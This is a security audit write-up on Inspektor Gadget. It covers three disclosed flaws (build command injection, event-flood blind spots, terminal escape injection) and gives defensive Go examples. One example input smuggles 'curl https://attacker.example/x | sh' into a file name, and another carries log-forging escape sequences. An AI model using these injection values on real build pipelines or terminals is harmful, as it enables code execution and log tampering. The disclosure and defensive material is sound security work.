- What: Security audit of Inspektor Gadget framework
- Impact: Audit report published for eBPF-based observability tool
In early 2026, Shielder was hired by OSTIF to perform a security audit of Inspektor Gadget, an eBPF-based framework that provides powerful and flexible observability tools for Kubernetes and Linux hosts. Today, we are publishing the full report in our dedicated repository.

Inspektor Gadget is both a framework and a toolkit to enhance observability on a Linux machine or Kubernetes node using eBPF. It manages the packaging, deployment and execution of "gadgets", which are essentially eBPF programs encapsulated in OCI images. Gadgets export events that the tool collects and that can be filtered, sorted, exported or enriched.

See it in action:

Before starting the audit, we sat down with the maintainers for a collaborative threat modeling session. With open source projects we have found this to be crucial: just looking at the code often does not yield the most interesting information, that is, how end users install, configure and use the project. As a result, two main points emerged:

With these attack scenarios in mind, we performed the audit by combining manual and AI-assisted analysis, dynamic testing, and SAST tooling such as semgrep and gosec. While auditing, we discovered three vulnerabilities (two with Medium severity, one with Low) that we reported through the project's GitHub Security portal:

Command Injection in ig build

Inspektor Gadget provides the tooling to build, push and pull custom gadgets (https://inspektor-gadget.io/docs/latest/gadget-devel/). The build flow used Makefile variable interpolation, which is prone to command injection when an attacker controls some of the variables used to build a new gadget: make hands each recipe line to a shell, so shell metacharacters inside an interpolated value are interpreted as part of the command. This could be leveraged by attackers, for instance, to gain code execution on CI/CD runners that build gadgets from untrusted input. The severity was set to Medium/Moderate, given the added complexity of controlling the build variables.
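As an added illustration (this is not Inspektor Gadget's build code), the following Go snippet contrasts the two approaches: a make-style recipe line whose interpolated variables end up in /bin/sh, versus the same compiler invocation expressed as an argument vector through os/exec, plus a hypothetical allow-list for gadget source paths. The compiler flags, the gadgetSource pattern and the function names are assumptions chosen for the example.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
)

// Added example, not Inspektor Gadget's build code. It contrasts a
// Makefile-style build line, where variables are pasted into a shell
// command, with an argv-based os/exec invocation and an allow-list check.

// unsafeBuildLine mimics what a Makefile recipe such as
//   $(CLANG) -target bpf -O2 -g -o $(OUTPUT) $(SOURCE)
// becomes after make interpolates the variables: a single string that is
// then handed to /bin/sh -c. Shell metacharacters in SOURCE or OUTPUT are
// interpreted, so "prog.c; curl evil | sh" runs a second command.
func unsafeBuildLine(source, output string) string {
	return fmt.Sprintf("clang -target bpf -O2 -g -o %s %s", output, source)
}

// safeBuildArgv expresses the same invocation as a discrete argument
// vector. No shell is involved, so a hostile value stays confined to one
// argv element and can at most make clang fail on an unknown file.
func safeBuildArgv(source, output string) []string {
	return []string{"clang", "-target", "bpf", "-O2", "-g", "-o", output, source}
}

// buildCmd wires the argv into exec.Cmd. exec.Command does not go through
// a shell; the compiler name is resolved on PATH and each argument is passed
// verbatim. The command is returned, not run, so callers can inspect it.
func buildCmd(source, output string) *exec.Cmd {
	argv := safeBuildArgv(source, output)
	return exec.Command(argv[0], argv[1:]...)
}

// gadgetSource is a deliberately strict, hypothetical allow-list for gadget
// source paths: relative, '/'-separated, components made of letters, digits,
// '_', '.' and '-' that do not start with '.', ending in ".c". Rejecting a
// leading '.' also rules out ".." traversal segments.
var gadgetSource = regexp.MustCompile(
	`^[A-Za-z0-9_][A-Za-z0-9_.-]*(/[A-Za-z0-9_][A-Za-z0-9_.-]*)*\.c$`)

// validGadgetSource applies the allow-list above. Validation is defence in
// depth on top of argv passing, not a replacement for it.
func validGadgetSource(p string) bool {
	return gadgetSource.MatchString(p)
}

func main() {
	// Constructed hostile input, as a CI job might receive from a pull request.
	hostile := "prog.bpf.c; curl https://attacker.example/x | sh"

	fmt.Println("make-style line:", unsafeBuildLine(hostile, "prog.o"))
	argv := safeBuildArgv(hostile, "prog.o")
	fmt.Printf("argv (%d elements): %q\n", len(argv), argv)
	fmt.Println("allow-list accepts hostile input:", validGadgetSource(hostile))
	fmt.Println("allow-list accepts gadgets/trace_open/program.bpf.c:",
		validGadgetSource("gadgets/trace_open/program.bpf.c"))
}
```

The point to take away is structural rather than about any single filter: as long as the build string is assembled and then handed to a shell, no amount of quoting is reliably safe, whereas an argv passed to exec.Command has no parser in between that could promote data to a command.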
The maintainers fixed this in version v0.51.1 by refactoring the build process to use Go machinery rather than Makefiles.

Denial of Service via Event Flooding

Inspektor Gadget captures all the events coming from deployed gadgets in a single kernel ring buffer whose size is hard-coded to 256 KB. When the gadgets push more events than the user-space collector can consume, the buffer fills up and new events are dropped. Inspektor Gadget silently ignored those dropped events, which would allow an attacker to first produce many harmless events to flood the buffer, and then perform malicious operations that no gadget would report. The severity was set to Medium/Moderate, as this only affects the integrity of the observation pipeline. The maintainers fixed this by tracking dropped events in a map, so that users can detect when events are being lost and build alerts on top of this limitation.

Unsanitized ANSI Escape Sequences in Columns Output Mode

When displaying gadget events in a terminal with the default output formatter, control characters and ANSI escape sequences were not sanitized. An attacker inside a container could therefore craft events carrying such sequences (for instance, by opening or creating files with attacker-controlled names) and have them injected into the operator's terminal. The impact depends on the terminal in use; at the very least, it could be used to forge new log lines or erase existing ones from the display. The severity was set to Low, as this already requires a compromised pod in the cluster and exploitability varies widely with the terminal used. The maintainers fixed this by sanitizing the text before sending it to the terminal.

Hardenings

During the audit, we also gathered some recommendations for the project to improve its security posture:

Gadget Bypasses
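The event-flooding scenario from the "Denial of Service via Event Flooding" finding, as an added Go model that is not the project's collector code: a bounded channel plays the fixed-size ring buffer, a consumer that never drains plays the overloaded collector, and an atomic drop counter plays the role of the dropped-events map the fix introduced. The event fields, the capacity of 256 entries and the helper names are assumptions made for the example.

```go
package main

import (
	"fmt"
	"sync/atomic"
)

// Added example, not Inspektor Gadget's collector. A bounded channel stands
// in for the kernel ring buffer and a drop counter stands in for the
// dropped-events map the fix introduced; the shapes are illustrative.

// Event is a trimmed-down gadget event.
type Event struct {
	PID  uint32
	Comm string
	Path string
}

// Collector is a fixed-capacity buffer between an eBPF producer and a
// user-space consumer.
type Collector struct {
	buf     chan Event
	dropped uint64 // total events lost because the buffer was full
	seen    uint64 // drop count at the previous CheckLoss call
}

func NewCollector(capacity int) *Collector {
	return &Collector{buf: make(chan Event, capacity)}
}

// Push is the producer side. A full buffer drops the event, which is what
// happens in the kernel when reserving space in the ring buffer fails.
// Pre-fix behaviour was "drop and tell nobody"; the counter is the fix.
func (c *Collector) Push(e Event) bool {
	select {
	case c.buf <- e:
		return true
	default:
		atomic.AddUint64(&c.dropped, 1)
		return false
	}
}

// Drain is the consumer side; it returns everything currently buffered.
func (c *Collector) Drain() []Event {
	var out []Event
	for {
		select {
		case e := <-c.buf:
			out = append(out, e)
		default:
			return out
		}
	}
}

// Dropped returns the total number of events lost since start.
func (c *Collector) Dropped() uint64 { return atomic.LoadUint64(&c.dropped) }

// CheckLoss returns the number of events lost since the previous call. A
// non-zero result means the pipeline was blind for part of that interval
// and an alert should fire, even though every delivered event looks harmless.
func (c *Collector) CheckLoss() uint64 {
	now := atomic.LoadUint64(&c.dropped)
	lost := now - c.seen
	c.seen = now
	return lost
}

// simulateFlood runs the attack from the finding with a consumer that does
// not keep up (it never drains): noise harmless events, then one malicious
// event. It reports whether the malicious event was delivered and how many
// events the health check sees as lost.
func simulateFlood(capacity, noise int) (delivered bool, lost uint64) {
	c := NewCollector(capacity)
	for i := 0; i < noise; i++ {
		c.Push(Event{PID: 1000, Comm: "noise", Path: fmt.Sprintf("/tmp/noise-%d", i)})
	}
	delivered = c.Push(Event{PID: 1001, Comm: "sh", Path: "/etc/shadow"})
	return delivered, c.CheckLoss()
}

func main() {
	// 256 entries stand for the hard-coded buffer; real events are variable-sized.
	delivered, lost := simulateFlood(256, 256)
	fmt.Printf("malicious event delivered: %v, events lost in interval: %d\n", delivered, lost)
}
```

Without the counter the consumer sees 256 perfectly ordinary events and has no way to tell that a 257th existed; with it, a periodic CheckLoss turns the blind spot into an alertable signal, which is the most a fixed-size buffer can offer short of blocking the producer.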
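One way to do the sanitization described in the "Unsanitized ANSI Escape Sequences" finding, as an added Go example rather than the project's formatter: strip complete ECMA-48 escape sequences (CSI, OSC and the other string-type sequences, including truncated ones) and render any remaining control character as a visible \xNN escape, so the analyst still sees that the event carried one instead of having it act on the terminal. The function names and the constructed file name are assumptions.

```go
package main

import (
	"fmt"
	"strings"
	"unicode"
)

// Added example, not the project's formatter. sanitizeTerminal takes an
// attacker-influenced value (a file name from an event, say) and returns a
// string that is safe to write to a terminal: escape sequences are removed
// and any remaining control character is rendered as a visible \xNN so the
// analyst still sees that something odd was there.
func sanitizeTerminal(s string) string {
	var b strings.Builder
	rs := []rune(s)
	for i := 0; i < len(rs); i++ {
		r := rs[i]
		if r == 0x1b {
			// ESC starts a sequence; skip it entirely.
			i += escapeLen(rs[i+1:])
			continue
		}
		if unicode.IsControl(r) { // C0 (incl. CR, LF, BEL), DEL and C1
			fmt.Fprintf(&b, "\\x%02x", r)
			continue
		}
		b.WriteRune(r)
	}
	return b.String()
}

// escapeLen returns how many runes following an ESC belong to its sequence,
// per ECMA-48:
//   CSI             ESC [ params(0x30-0x3f)* intermediates(0x20-0x2f)* final(0x40-0x7e)
//   OSC/DCS/PM/APC  ESC ] or P or ^ or _ ... terminated by BEL or ST (ESC \)
//   nF              ESC intermediate(0x20-0x2f) final
//   Fe/Fs           ESC + one byte
// A truncated sequence consumes whatever is left rather than leaking it.
func escapeLen(rest []rune) int {
	if len(rest) == 0 {
		return 0
	}
	switch rest[0] {
	case '[':
		n := 1
		for n < len(rest) && rest[n] >= 0x30 && rest[n] <= 0x3f {
			n++
		}
		for n < len(rest) && rest[n] >= 0x20 && rest[n] <= 0x2f {
			n++
		}
		if n < len(rest) && rest[n] >= 0x40 && rest[n] <= 0x7e {
			n++
		}
		return n
	case ']', 'P', '^', '_':
		for n := 1; n < len(rest); n++ {
			if rest[n] == 0x07 {
				return n + 1
			}
			if rest[n] == 0x1b && n+1 < len(rest) && rest[n+1] == '\\' {
				return n + 2
			}
		}
		return len(rest)
	default:
		if rest[0] >= 0x20 && rest[0] <= 0x2f && len(rest) >= 2 {
			return 2
		}
		return 1
	}
}

func main() {
	// Constructed file name an attacker in a container might create: it
	// clears the line and moves the cursor up to overwrite the previous log.
	evil := "/tmp/.hidden\x1b[2K\x1b[1Aaudit: nothing to see\r"
	fmt.Printf("raw bytes:  %q\n", evil)
	fmt.Printf("sanitized:  %s\n", sanitizeTerminal(evil))
}
```

Stripping sequences and escaping bare control characters are deliberately different choices: a cursor-movement sequence has no analytic value and is best removed, while a stray CR or BEL in a path is itself an indicator worth leaving visible. Either way the output contains no byte the terminal will interpret.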